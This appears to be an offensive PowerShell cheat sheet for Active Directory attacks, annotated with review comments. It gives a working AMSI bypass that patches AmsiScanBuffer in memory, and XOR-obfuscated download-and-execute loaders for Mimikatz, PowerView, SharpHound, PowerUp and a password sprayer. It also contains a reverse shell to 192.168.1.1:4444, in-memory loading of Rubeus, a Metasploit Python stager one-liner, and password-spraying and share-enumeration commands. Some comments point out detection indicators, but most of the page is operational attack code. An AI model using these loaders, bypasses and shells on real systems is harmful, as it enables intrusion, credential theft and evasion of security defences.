Powershell / PowerView
Sometimes you're stuck with the tools in front of you and no Linux box, etc.
XOR Encode powershell payload
# XOR-obfuscate Get-GPPPassword.ps1 for transport: every UTF-8 byte of the
# script is XORed with 0x11 and the result written next to it as .txt.
# This is reversible obfuscation, not encryption — the key is one fixed byte
# and the input is a public script, so the output is a stable byte pattern
# that is just as signature-able as the original.
# The matching decoders on this page (the "Import ..." blocks) fetch the result
# as text and decode it with ASCII.GetString, so the round-trip only holds for
# pure-ASCII scripts — TODO confirm the scripts contain no non-ASCII characters.
# NOTE(review): `-bXor0x11` has no space before the operand; add one if the
# tokenizer rejects it.
$file=([Text.Encoding]::UTF8.GetBytes([IO.File]::ReadAllText(".\Get-GPPPassword.ps1"))| %{$_ -bXor0x11})
[io.file]::WriteAllBytes('.\Get-GPPPassword.txt',$file)
Bypass AMSI
# In-process AMSI patch. Add-Type compiles a small C# wrapper that exposes
# three kernel32 exports via P/Invoke: LoadLibrary, GetProcAddress and
# VirtualProtect. (Add-Type with inline source builds a temporary assembly —
# TODO confirm whether the compiler invocation is visible to host monitoring
# on the target build.)
$Win32 = @"

using System;
using System.Runtime.InteropServices;

public class Win32 {

[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);

[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

Add-Type $Win32

# Resolve amsi.dll!AmsiScanBuffer inside this PowerShell process. The string
# concatenation only splits the literals at the source-text level — the
# resolved names are unchanged, and script block logging (event 4104) records
# the concatenated source itself, which is a well-known indicator for this
# technique.
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
# Make the function entry writable: 0x40 is PAGE_EXECUTE_READWRITE and $p
# receives the previous protection (which is never restored, leaving an RWX
# region inside amsi.dll's image — an artefact memory scanners look for).
# NOTE(review): 5 bytes are requested here but 6 are written below.
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
# Overwrite the first 6 bytes of AmsiScanBuffer so it returns immediately,
# disabling AMSI scanning for the current process only; child processes and
# other hosts are unaffected.
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
Import AD Recon
# Download the XOR-obfuscated copy of ADRecon from a third-party GitHub repo,
# decode it and run it in memory. $file is reused: first the URL, then the
# downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/adrecon.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerView
# Download the XOR-obfuscated copy of PowerView from a third-party GitHub
# repo, decode it and run it in memory. $file is reused: first the URL, then
# the downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerView.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import DomainPasswordSpray
# Download the XOR-obfuscated copy of DomainPasswordSpray from a third-party
# GitHub repo, decode it and run it in memory. $file is reused: first the URL,
# then the downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/DomainPasswordSpray.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
# First pass: try each account's own username as its password
# (-UsernameAsPassword) for every user in users.txt; hits go to valid-creds.txt.
Invoke-DomainPasswordSpray -domain thehackerlab.local -UsernameAsPassword -UserList users.txt -OutFile valid-creds.txt

# Second pass: one candidate password against every listed user. Each pass is
# one logon attempt per user; with a domain lockout threshold in place this
# locks accounts, and the burst of failed logons (4625/4771) followed by 4740
# lockouts is exactly what spraying detections key on.
# NOTE(review): the `Then` line below is prose from the page, not a command.
Then
Invoke-DomainPasswordSpray -domain thehackerlab.local -UserList users.txt -OutFile valid-creds.txt -Password Winter2016
Import Get-GPPPassword
# Download the XOR-obfuscated copy of Get-GPPPassword (the output of the
# encoder at the top of the page) from a third-party GitHub repo, decode it
# and run it in memory. $file is reused: first the URL, then the downloaded
# text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Get-GPPPassword.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11). NOTE(review): the bytes travel as text
# (DownloadString) and are decoded as ASCII below, so the round-trip only
# holds for pure-ASCII scripts; `-bXor0x11` has no space before the operand —
# add one if the tokenizer rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
# Run with
# Ask the named domain/DC for Group Policy Preference items that still carry a
# cpassword value (presumably the Groups.xml-style files under SYSVOL — verify
# against the tool's source). Anything returned is a password the domain
# should treat as exposed; the defender-side fix is to delete the preference
# item, not only to rotate the account.
Get-GPPPassword -server thehackerlab.com
Import Sherlock
# Download the XOR-obfuscated copy of Sherlock from a third-party GitHub repo,
# decode it and run it in memory. $file is reused: first the URL, then the
# downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-Sherlock.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowerUp
# Download the XOR-obfuscated copy of PowerUp from a third-party GitHub repo,
# decode it and run it in memory. $file is reused: first the URL, then the
# downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerUp.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Sharphound
# Download the XOR-obfuscated copy of SharpHound from a third-party GitHub
# repo, decode it and run it in memory. $file is reused: first the URL, then
# the downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-SharpHound.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import Mimikatz
# Download the XOR-obfuscated Mimikatz script from a third-party GitHub repo,
# decode it and run it in memory. $file is reused: first the URL, then the
# downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/mimikatz.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Import PowershellTCP
# Download the XOR-obfuscated copy of Invoke-PowerShellTcp from a third-party
# GitHub repo, decode it and run it in memory. $file is reused: first the URL,
# then the downloaded text.
$file = "https://raw.githubusercontent.com/jdksec/RemoteTools/master/Invoke-PowerShellTcp.txt"

$enc = [system.Text.Encoding]::UTF8
# Plain HTTPS GET with no integrity check: what runs below is whatever the
# repo (or whoever controls that connection) serves.
$file = ((New-Object Net.Webclient).DownloadString($file))
# Undo the single-byte XOR (key 0x11) applied by the encoder at the top of the
# page. NOTE(review): the bytes travel as text (DownloadString) and are decoded
# as ASCII below, so the round-trip only holds for pure-ASCII scripts;
# `-bXor0x11` has no space before the operand — add one if the tokenizer
# rejects it.
$data = $enc.GetBytes($file)|%{$_-bXor0x11}
# iex compiles and runs the decoded text; that is where script block logging
# (4104) and AMSI see it in clear — the XOR only hides it on the wire and on disk.
iex ([System.Text.Encoding]::ASCII.GetString($data))
Upgrade nc shell to reverse meterpreter for pivoting
# Then run
# Connect back from the victim to the listener at 192.168.1.1:4444 with an
# interactive PowerShell; the listener has to be up before this runs. On the
# network this is an outbound TCP connection from powershell.exe to a
# non-standard port, which is the obvious egress-monitoring indicator.
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.1 -Port 4444
Download Rubeus.exe
# Fetch Rubeus.exe as raw bytes and load it as a .NET assembly without writing
# it to disk, then call its entry point with the "triage" argument.
# Note the curly quotes (‘ ’ “ ”) from copy-paste — PowerShell's tokenizer is
# believed to accept them as string delimiters, but normalize to ' and " if
# the line is reused elsewhere.
$x = (New-Object System.Net.WebClient).downloadData(‘https://github.com/jdksec/RemoteTools/raw/master/Rubeus.exe’)
# Assembly.Load from a byte array: nothing touches disk, but it is still an
# in-memory module load inside the PowerShell process, visible to .NET/ETW
# telemetry (and presumably to AMSI's assembly scan on recent .NET — confirm).
$y = [System.Reflection.Assembly]::Load($x)
# "triage".Split() -> a one-element string[] for Main; triage is Rubeus's
# listing of the Kerberos tickets present in the session.
[Rubeus.Program]::Main(“triage”.Split())
Install Python from the Windows Store as a low-privilege user
# On attacking server
# Metasploit web_delivery: serves a Python stager over HTTP on srvport (443)
# and waits for the stage to call back to lhost:lport (192.168.1.1:80).
# Note the port split: the script is fetched from :443 over plain HTTP (see
# the URL below) while the payload connects back to :80.
use exploit/multi/script/web_delivery
set lhost 192.168.1.1
set lport 80
set srvport 443
set payload python/meterpreter/reverse_tcp
exploit

# On victim machine
# One-liner as printed by the module; /vcHsXENK is the random URI of that run
# and is regenerated each time. It works on Python 2 and 3 via the
# urllib/urllib.request switch. ssl._create_unverified_context() disables
# certificate validation, so even an HTTPS variant of this download would be
# unauthenticated, and exec() runs the downloaded text in the interpreter
# without touching disk — process-creation logging of a long `python -c`
# command line is the host-side indicator.
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.1.1:443/vcHsXENK', context=ssl._create_unverified_context());exec(r.read());"
Recon all computers in domain
# PowerView: bucket the domain's computers by their operatingSystem attribute,
# one output file per OS family. The patterns are substring wildcards, so they
# overlap: *8* would also match "2008", hence the leading space in "* 8*";
# *7* and *10* likewise match any value containing those digits. The 2003,
# 2008, XP and 7 buckets are the out-of-support systems worth handing to the
# blue team. Depending on the PowerView version Get-NetComputer returns plain
# name strings or full objects; with objects Out-File writes a formatted table
# rather than bare names — check the output before feeding it to other tools.
# -Encoding ASCII keeps the files readable by non-PowerShell tooling.
# Note the en dashes (–) before parameter names from copy-paste; PowerShell is
# believed to accept them, but use "-" if pasting elsewhere.
Get-NetComputer –OperatingSystem *2003* | Out-File –Encoding ASCII Windows2003Hosts.txt
Get-NetComputer –OperatingSystem *2008* | Out-File –Encoding ASCII Windows2008Hosts.txt
Get-NetComputer –OperatingSystem *2012* | Out-File –Encoding ASCII Windows2012Hosts.txt
Get-NetComputer –OperatingSystem *2016* | Out-File –Encoding ASCII Windows2016Hosts.txt
Get-NetComputer –OperatingSystem *2019* | Out-File –Encoding ASCII Windows2019Hosts.txt
Get-NetComputer –OperatingSystem *XP* | Out-File –Encoding ASCII WindowsXPHosts.txt
Get-NetComputer –OperatingSystem *7* | Out-File –Encoding ASCII Windows7Hosts.txt
Get-NetComputer –OperatingSystem * 8* | Out-File –Encoding ASCII Windows8Hosts.txt
Get-NetComputer –OperatingSystem *10* | Out-File –Encoding ASCII Windows10Hosts.txt
Get list of all dns hostnames in domain
# Write every computer's dnshostname to allcomputers.txt for the loops further
# down the page.
# NOTE(review): `select dnshostname` emits objects, so Out-File writes a
# formatted table (a "dnshostname" header, a dashed line, blank lines) rather
# than bare names; `Select-Object -ExpandProperty dnshostname` yields the
# strings. Until then, consumers of this file (the resolver loop below) must
# skip those header lines. -Append keeps earlier content, so re-running the
# command duplicates entries.
get-netcomputer -domain thehackerlab.local | select dnshostname | out-file -append allcomputers.txt
Count number of lines in file
# Count the lines of allcomputers.txt — a quick "how many hosts" check.
# NOTE(review): Measure-Object -Line is believed to skip empty lines; confirm
# if an exact count matters.
Get-Content -Path .\allcomputers.txt | Measure-Object -Line
Find interesting shares
# Enumerate shares across the domain: step 1 exports the computer objects to
# CSV, step 2 pulls the dnshostname column, step 3 runs ShareFinder per host
# and appends the results to shares.csv.
Get-NetComputer -domain thehackerlab.com | export-csv -Encoding ASCII allhosts.csv
# NOTE(review): without -ExpandProperty this writes a formatted table (header,
# dashed line, blank trailer) rather than bare names, so step 3 also calls
# ShareFinder with "dnshostname", "-----------" and "" as computer names.
import-csv .\allhosts.csv | select dnshostname | out-file dnshostnames.txt
# -CheckShareAccess presumably keeps only shares the current account can read
# (verify against the PowerView version in use); Export-Csv -Append needs
# PowerShell 3+. This is one SMB enumeration from this account to every host
# in the list — noisy on the wire and in the targets' share-access events (5140).
get-content .\dnshostnames.txt | foreach-object {invoke-sharefinder -computername $_ -checkshareaccess} |export-csv -append shares.csv
Split csv to hostnames
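# Pull the ComputerName column out of shares.csv as plain text, one host per
# line, for the de-duplication step that follows.
# -ExpandProperty emits the string values; without it Select-Object emits
# objects and ">" writes a formatted table (header line and dashes) instead of
# bare names. -Encoding ASCII matches the other exports on this page, whereas
# ">" defaults to UTF-16 in Windows PowerShell 5.1.
Import-Csv .\shares.csv | Select-Object -ExpandProperty ComputerName | Out-File -Encoding ASCII hostnames.txt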
Sort hostnames so they are unique
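# Sort hostnames.txt and drop duplicates into uniquehostnames.txt.
# Get-Unique only removes *adjacent* duplicates, so on unsorted input (as
# hostnames.txt is) repeats survive; Sort-Object -Unique sorts and
# de-duplicates in one step. Note Sort-Object compares case-insensitively by
# default, which is what you want for hostnames.
Get-Content .\hostnames.txt | Sort-Object -Unique | Out-File uniquehostnames.txt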
Get live IP addresses
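# Resolve every name in allcomputers.txt and collect the addresses that answer.
# Input : .\allcomputers.txt, one hostname per line. Blank lines and the
#         table-header lines that "select dnshostname | out-file" produces
#         ("dnshostname", "-----------") are skipped.
# Output: "<name>: <ip[, ip]>" or "<name>: Cannot resolve hostname" on the
#         pipeline, plus one resolved address per line appended to
#         .\ipaddresses.txt (default Out-File encoding, as before).
Get-Content .\allcomputers.txt | ForEach-Object {
  $name = $_.Trim()
  # Dns.GetHostAddresses('') resolves the *local* host, so an empty line would
  # silently add this machine's own addresses to the list; the header and
  # dashed separator lines are dropped for the same reason.
  if ($name -eq '' -or $name -eq 'dnshostname' -or $name -match '^-+$') { return }
  try {
    # A name may resolve to several addresses; keep all of them.
    $addresses = [System.Net.Dns]::GetHostAddresses($name).IPAddressToString
    $name + ': ' + ($addresses -join ', ')
    $addresses >> ipaddresses.txt
  }
  catch {
    # Resolution failure is reported on the pipeline and the loop continues;
    # nothing is written to ipaddresses.txt for this name.
    $name + ': Cannot resolve hostname'
  }
}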
Remove all external addresses
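# Keep only RFC 1918 addresses from ipaddresses.txt in internalips.txt.
# findstr treats each space-separated word as a separate search string; /R
# makes them regular expressions and ^ anchors each to the start of the line,
# otherwise "10." would also match e.g. "192.168.10.1". The original "172.32"
# was outside the private range: 172.16.0.0/12 covers 172.16 through 172.31
# only, so that octet is matched with three classes.
Get-Content ipaddresses.txt | findstr /R "^10\. ^192\.168\. ^172\.1[6-9]\. ^172\.2[0-9]\. ^172\.3[01]\." > internalips.txt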